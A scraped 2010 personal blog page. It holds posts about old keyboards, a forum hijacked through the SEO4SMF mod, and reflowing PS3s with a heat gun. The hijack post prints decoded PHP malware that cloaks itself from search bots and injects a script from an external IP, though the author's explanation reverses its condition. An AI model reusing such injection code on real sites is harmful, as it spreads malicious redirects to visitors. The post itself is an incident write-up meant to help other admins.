Personal Blog
Symantec a new dictatorship?August 15, 2010, 01:41:10 PM
Warning.. This is a rant and it's directly aimed at Let's go back to yesterday!July 23, 2010, 01:13:41 AM
I find myself using my old PS/2 Logitech keyboard that's about 6 or 7 years old because I cant find a similar keyboard that has the same key resistance and 'clunkyness' in the newer ones. It is embarrassing to show people who come over though. My friends often say "nice setup.. whoa.. that keyboard looks ancient!". I am starting to feel like an old man - next I will be saying "They don't make em they way they used to!". I visited one of my friends and he bought the latest in the logitech series of keyboards. (sounded like a terminator model) It had about a thousand different functions and an on-board LCD screen.. All I could say is.. Really.. is that necessary? Why would you look at the LCD screen on your keyboard? I went to use his keyboard and it felt horrible - there was hardly any resistance and it was completely silent. Maybe that's a good thing? Am I the only one who enjoys a good 'clunk'? Lee-Soft.com was hijackedApril 24, 2010, 03:32:31 AM
At first I thought it was human malice but it turns out to be just another bot. A new kind of spam-bot that reprograms websites to redirect to a URL it wants its victims to visit. Yesterday it hit lee-soft.com and within the hour I received e-mails from users about the forums redirecting them to random websites. My initial reaction was to panic - how on earth could someone modify my website without having access to the files remotely. If we run this through a base64 decoder we will get something that looks like this: Code: if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) { return "<script src="http://61.4.82.XXX/js.php"></script>" };In English this is something like.. If you are a Google bot or a Yahoo bot return this script. (This is how Google and Firefox marked my site as containing malware. No doubt that JavaScript contains lots of nastiness) since most people on my forum are neither a google bot nor a yahoo bot we don't care what happens there so much. The next part of the code was encoded in zip format (The guy who wrote this obviously didn't want people to see the source of his 'fine' work of art). I am not posting that part of the code here has its too long. I will tell you what it did though If visitor has not been redirected yet then redirect them and then write it in their cookies so next time they do not get re-directed again. (Making it appear to a random glitch) This is not enough to prevent re-infection and we should be more concerned with how this could be allowed to happen in first place. This I am still not certain of yet. However I have taken steps to prevent the site rewriting its own scripts (which is how the exploit would have to operate unless the bot knew my FTP account details which i doubt they do). I suggest SMF admins take the following steps to prevent infection.
Things that probably wont help (in this case) is preventing the uploading of certain file types or changing passwords. However that's generally good practice anyway. I take no responsibility if you break your site following my instructions! I am writing it for the benefit of others. I have verified the scripts over and over every few hours. When I find out how the site got infected I will post something about it. UPDATE 02/05/2010: It appears the SMF cleanup utility wont find all the modifications done to SMF forums. I was hijacked again this morning but i quickly countered it thanks to the community for quickly advising me of the situation again. (Thanks again rainoffire) I have also found out where the security whole was - SEO4SMF. This mod is responsible for the first infection and the reinfection of lee-soft.com. I suggest immediate removal of this mod or updating it to a newer version. The newest version looks like it has been patched (for now). There could be other holes which we don't know about yet though. Using any add-on or mod presents a security risk to your forums - Proceed with caution. The sony timer theory?November 23, 2009, 04:06:48 PM
[float=right] Quote The failure rate of PS3 is 0.5 %, (which is less than the accepted failure rate for electrical goods), compared to the 360 which was around the 30% mark. That number is substantially less now but still much higher than that of the PS3 and the accepted failure rate for electrical goods. BBC Watchdog apparently launched their own investigation on the matter. Which invoked this amusing response from Sony Quote “We entirely refute the suggestion that PS3 consoles have an inherent defect or other design issue which is akin to any warranty issue experienced by another console manufacturer. “From the correspondence to date, I have serious concerns as to the accuracy of these allegations and the likely tone of the Watchdog report. The information that you have provided suggests a fundamental misunderstanding of the technical issues and a mis-characterisation of SCE UK’s OOW repairs policy. Is my brother one of the 0.5% people affected (remember, these figures are calculated by Sony and obviously cannot be trusted. Just like Microsoft's fake figures of the RROD failures). Well maybe he is that unlucky. Anyway a few years ago a Japanese guy told me about what he called the "sony timer" theory. Apparently it's well known. Although it could just be small minority of people who have been very unlucky with Sony products. Although i am sure it would be more than 0.5% ;) (since it's a well known theory). He proposed that Sony intentionally engineer defects in their products which causes the product to fail just short of the warranty period. The only problem with that theory is that we know Sony sell PS3's at a loss. So i looked at how much a PS3 would be to get repaired officially, apparently it's around the £130 mark for YLOD. Although the BBC Watchdog crew made it look like it should be a £5 job. From i could tell in the video. They simply disassembled the units and reflowed. (The same effects could be achieved with a heat gun) So i did what they did only i used a heat gun instead. It worked great. If anyone decides to copy me (Which i take no responsibility for) then i recommend using a temperature controlled heat gun set on the lowest blow-speed and around 350 C. You should probably follow a guide. gilksy1 does a good guide. You can watch his youtube video here; http://www.youtube.com/watch?v=U70SgRDVcBo Happy un-LYOD-ing
|